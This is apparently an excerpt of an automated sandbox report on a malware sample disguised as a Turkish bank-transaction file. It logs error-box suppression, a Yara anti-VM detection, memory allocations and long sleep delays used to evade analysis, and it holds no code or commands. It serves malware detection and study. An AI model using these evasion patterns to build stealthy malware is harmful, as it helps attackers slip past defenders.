Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EfgRyiVrT.exe PID: 6272, type: MEMORYSTR

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: 8D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: 7820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: 9D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: AD70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: 1290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: 2D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Memory allocated: 4D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 1750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 3320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 5320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 8F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: A170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: B170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 2A20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 2C50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Memory allocated: 2A60000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597777	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597448	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597198	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596874	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594577	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Thread delayed: delay time: 594355	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598838
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598181
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 598042
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597936
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596938
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596813
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596688
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596469
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595473
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594922
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594813
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594594
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Thread delayed: delay time: 594375

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6676	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 531	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6202	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Window / User API: threadDelayed 2198	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Window / User API: threadDelayed 7650	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Window / User API: threadDelayed 2025
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Window / User API: threadDelayed 7829

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 6228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6404	Thread sleep count: 6676 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1672	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896	Thread sleep count: 531 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5928	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5396	Thread sleep count: 2198 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5396	Thread sleep count: 7650 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe TID: 5928	Thread sleep time: -597890s >= -30000s	Jump to behavior
